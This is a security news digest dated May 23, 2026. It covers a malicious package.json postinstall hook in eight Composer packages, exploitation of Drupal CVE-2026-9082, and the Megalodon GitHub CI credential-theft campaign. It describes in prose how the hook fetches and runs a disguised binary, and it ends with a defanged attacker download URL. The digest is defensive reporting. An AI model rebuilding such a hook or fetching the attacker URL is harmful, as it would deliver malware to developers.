The security landscape on May 23, 2026, presents a critical convergence of supply chain threats and active exploitation campaigns. Researchers have identified coordinated attacks spanning multiple ecosystems, from PHP package repositories to GitHub workflows, while active exploitation of newly disclosed vulnerabilities continues to accelerate.
Socket researchers have uncovered a coordinated supply chain campaign affecting eight Composer packages whose upstream repositories were modified to include identical malicious postinstall scripts. The attack demonstrates a sophisticated cross-ecosystem targeting strategy, as the malicious code was inserted into package.json rather than composer.json, potentially evading detection by developers and security teams focused solely on PHP dependency metadata. This placement is particularly dangerous because developers reviewing Composer packages may overlook JavaScript lifecycle hooks bundled within the same repository.
The malicious postinstall script downloads a Linux binary named gvfsd-network from an attacker-controlled GitHub Releases URL, writes it to /tmp/.sshd, makes it executable, and runs it in the background. The command disables TLS certificate verification using curl -k, suppresses error output, and disguises the executable under a system-like filename. The affected packages include moritz-sauer-13/silverstripe-cms-theme, crosiersource/crosierlib-base, devdojo/wave, devdojo/genesis, katanaui/katana, elitedevsquad/sidecar-laravel, r2luna/brain, and baskarcm/tzi-chat-ui. GitHub code searches revealed hundreds of additional references tied to the same attacker infrastructure, suggesting the campaign extends far beyond the confirmed Packagist findings.
The most significant exposure exists in starter kit projects, particularly devdojo/wave with approximately 6,400 GitHub stars and 9,100 Packagist installs. When developers clone these repositories, the malicious package.json lands at the project root, where npm install executes the postinstall script directly. Socket has recommended that teams using Packagist packages containing JavaScript build tooling inspect bundled package.json files alongside composer.json, with heightened vigilance for branch-tracking dependencies where package contents can change as upstream branches evolve. Source: Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects
The Cybersecurity and Infrastructure Security Agency has added Drupal core SQL injection vulnerability CVE-2026-9082 to its Known Exploited Vulnerabilities catalog, signaling official recognition of the threat. This addition to the KEV catalog typically indicates that the vulnerability has been observed in active exploitation attempts and warrants immediate prioritization by defenders. Source: RT @CISACyber: 🛡️ We added Drupal core SQL injection vulnerability CVE-2026-9082 to our KEV Cata...
Security researchers have confirmed that threat actors are actively exploiting the Drupal SQL injection vulnerability, CVE-2026-9082, which has been classified as highly critical. The rapid transition from disclosure to active exploitation underscores the urgency of patching, as attackers have already begun leveraging this flaw in real-world attacks. Organizations running Drupal installations should prioritize immediate remediation to prevent unauthorized database access and potential data exfiltration. Source: Drupal: Critical SQL injection flaw now targeted in attacks
SafeDep researchers have documented a large-scale supply chain attack designated Megalodon that targeted 5,561 GitHub repositories with malicious CI workflows and cloud credential theft mechanisms within a six-hour window. The attack demonstrates the velocity and scale at which modern supply chain threats can propagate, leveraging GitHub's CI/CD infrastructure to distribute malicious payloads. The attack involved malicious artifacts tracked as Optimize-Build and SysDiag, which attempted to harvest cloud credentials and establish persistence within compromised development environments. This incident underscores the critical need for organizations to implement strict controls over CI/CD pipeline configurations and monitor for unauthorized workflow modifications. Source: 5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours
The convergence of these threats—from cross-ecosystem package poisoning to active zero-day exploitation and massive CI/CD compromises—reflects an increasingly sophisticated threat landscape targeting the software supply chain. Organizations must implement layered defenses including dependency scanning, workflow auditing, and rapid patching protocols to mitigate these interconnected risks.
Source articles and extracted indicators (defanged where appropriate).
hxxps://github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network